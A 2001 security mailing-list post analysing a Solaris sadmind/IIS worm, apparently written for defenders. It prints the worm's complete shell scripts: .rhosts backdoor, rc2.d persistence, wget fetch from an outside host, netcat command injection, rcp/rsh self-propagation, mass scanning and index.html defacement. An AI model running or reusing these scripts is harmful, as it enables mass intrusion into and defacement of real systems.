Hello, Brad Doctor wrote: > I've also seen much of the same -- I submitted this to the list over the > weekend, but it apparently never made it there. > > Basically, there is a worm process much like Lion, etc. that after compromising > the machine, starts generating IP addresses and going after more. The exploit > that is being used is some sort of sadmin exploit. A tell-tale sign is a > root shell open on port 600 (not functional however). The exploit places it's > contents in /dev/cuc and goes to town with a perl script and a random number > generator. It also creates a wide-open .rhosts for root. It also starts > an inetd process with /tmp/.x that has one service, the root shell bound to > it, just like the lion stuff did ala "sh -i", however this shell has no IO > capabilities on Solaris, and is thus useless. So, much like the other worms, > this one trudges on blindly after cracking a machine that was wide-open to > begin with. I think the same group wrote this one as well due to it's > similarities in execution and methodology. It is executing Unicode attacks, > with static HTML in the perl script, typical anti US stuff. In the last five days or so I have seen about 9 scans for port 111 on a single machine. Scanning back these hosts has shown that 8 of them are running under solaris 5.6 and have an open port 600. The root shell on the machines I have seen was functional if you connect to them with a program like netcat instead of telnet since a simple "sh -i" does not set appropriate environment. The worm itself uses port 600 initial to create a "+ +" .rhosts file in the root home directory of a new hacked box and than copy itself via rcp as /tmp/uni.tar to these box. There ist the filelist of the /tmp/uni.tar that I have found: drwxr-xr-x 0/1 0 Apr 29 12:55 2001 /dev/cuc/ -rwxr-xr-x 0/1 6556 Apr 26 08:07 2001 /dev/cuc/brute -rw-r--r-- 0/1 86 Apr 26 09:13 2001 /dev/cuc/cmd1.txt -rw-r--r-- 0/1 655 Apr 29 12:17 2001 /dev/cuc/cmd2.txt -rwxr-xr-x 0/1 11828 Apr 25 15:27 2001 /dev/cuc/grabbb -rw-r--r-- 0/1 151 Apr 26 09:13 2001 /dev/cuc/ranip.pl -rwxr-xr-x 0/1 1591 Apr 27 06:38 2001 /dev/cuc/sadmin.sh -rwxr-xr-x 0/1 14644 Apr 25 15:27 2001 /dev/cuc/sadmindex-sparc -rwxr-xr-x 0/1 217 Apr 26 09:59 2001 /dev/cuc/start.sh -rwxr-xr-x 0/1 566 Apr 27 03:45 2001 /dev/cuc/time.sh -rw-r--r-- 0/1 67798 Apr 26 09:13 2001 /dev/cuc/uniattack.pl -rwxr-xr-x 0/1 645 Apr 26 09:13 2001 /dev/cuc/uniattack.sh -rwxr-xr-x 0/1 28620 Apr 26 08:30 2001 /dev/cuc/nc -rw-r--r-- 0/1 413 Apr 26 11:16 2001 /dev/cuc/index.html -rwxr-xr-x 0/1 136248 Apr 29 09:20 2001 /dev/cuc/wget And these are the shell scripts: cat cmd1.txt ------------ /bin/echo "+ +" > `/bin/grep root /etc/passwd|/bin/awk -F: '{print $6}'`/.rhosts exit cat cmd2.txt ------------ /bin/tar -xvf /tmp/uni.tar /bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1 /bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1 /bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2 /bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc /bin/chmod 744 /etc/rc2.d/S71rpc /dev/cuc/wget -c -O /tmp/perl-5.005_03-sol26-sparc-local.gz http://202.96.209.10:80/mirrors/www.sunfreeware.com/sparc/2.6/perl-5.005_03-sol26-sparc-local.gz /dev/cuc/gzip -d /tmp/perl-5.005_03-sol26-sparc-local.gz /bin/mkdir /usr/local /bin/cat /dev/cuc/pkgadd.txt|/usr/sbin/pkgadd -d /tmp/perl-5.005_03-sol26-sparc-local /bin/rm -f /tmp/uni.tar /tmp/perl-5.005_03-sol26-sparc-local exit cat start.sh ------------ #!/bin/sh if [ ! -d /dev/cub ]; then /bin/mkdir /dev/cub fi /bin/nohup /dev/cuc/time.sh & i=1 while [ $i -lt 5 ] do /bin/nohup /dev/cuc/sadmin.sh & /bin/nohup /dev/cuc/uniattack.sh & i=`/bin/echo "$i+1"|/bin/bc` done cat time.sh ----------- #!/bin/sh /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp1 while true do /bin/sleep 300 /bin/ps -ef|/bin/grep uniattack.pl > /dev/cub/tmp2 /bin/awk '{print $2}' /dev/cub/tmp1 > /dev/cub/tmp3 process=`/bin/awk '{print $2}' /dev/cub/tmp2` for p in $process;do /bin/grep $p /dev/cub/tmp3 if [ $? = 0 ];then /bin/kill -9 $p fi done /bin/cp /dev/cub/tmp2 /dev/cub/tmp1 i=`/bin/grep hacked /dev/cub/result.txt|/bin/wc -l` if [ $i -gt 2000 ];then /bin/nohup /bin/find / -name "index.html" -exec /bin/cp /dev/cuc/index.html {} \; & /bin/rm -f /dev/cub/result.txt fi done cat sadmin.sh ------------- #!/bin/sh while true do i=`/usr/local/bin/perl /dev/cuc/ranip.pl` j=0 while [ $j -lt 256 ];do /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 111 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 111 >> /dev/cub/$i.txt j=`/bin/echo "$j+1"|/bin/bc` done iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt` for ip in $iplist;do /bin/rpcinfo -p $ip > /dev/cub/$i.rpc.txt /bin/grep 100232 /dev/cub/$i.rpc.txt >/dev/null 2>&1 if [ $? = 0 ];then /dev/cuc/brute 3 $ip >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/tar -cvf /tmp/uni.tar /dev/cuc /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 & /bin/echo $ip >> /dev/cub/sadminhack.txt /bin/rm -f /tmp/uni.tar fi else /dev/cuc/brute 4 $ip >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd1.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/tar -cvf /tmp/uni.tar /dev/cuc /bin/rcp /tmp/uni.tar root@$ip:/tmp/uni.tar >/dev/null 2>&1 if [ $? = 0 ];then /bin/cat /dev/cuc/cmd2.txt|/dev/cuc/nc $ip 600 >/dev/null 2>&1 /bin/rsh -l root $ip /etc/rc2.d/S71rpc >/dev/null 2>&1 & /bin/echo $ip >> /dev/cub/sadminhack.txt /bin/rm -f /tmp/uni.tar fi fi fi fi /bin/rm -f /dev/cub/$i.rpc.txt done /bin/rm -f /dev/cub/$i.txt done cat uniattack.sh ---------------- #!/bin/sh while true do i=`/usr/local/bin/perl /dev/cuc/ranip.pl` j=0 while [ $j -lt 256 ];do /dev/cuc/grabbb -t 3 -a $i.$j.1 -b $i.$j.50 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.51 -b $i.$j.100 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.101 -b $i.$j.150 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.151 -b $i.$j.200 80 >> /dev/cub/$i.txt /dev/cuc/grabbb -t 3 -a $i.$j.201 -b $i.$j.254 80 >> /dev/cub/$i.txt j=`/bin/echo "$j+1"|/bin/bc` done iplist=`/bin/awk -F: '{print $1}' /dev/cub/$i.txt` for ip in $iplist;do /usr/local/bin/perl /dev/cuc/uniattack.pl $ip:80 >> /dev/cub/result.txt done rm -f /dev/cub/$i.txt regards, Martin -- Martin Markgraf Rien Informationssysteme AG fon: +49 2841 9083061 Eurotec-Ring 15 fax: +49 2841 9083069 D-47445 Moers http://www.rien-ag.de mm@rien-ag.de
This archive was generated by hypermail 2b30 : Thu May 10 2001 - 23:26:53 PDT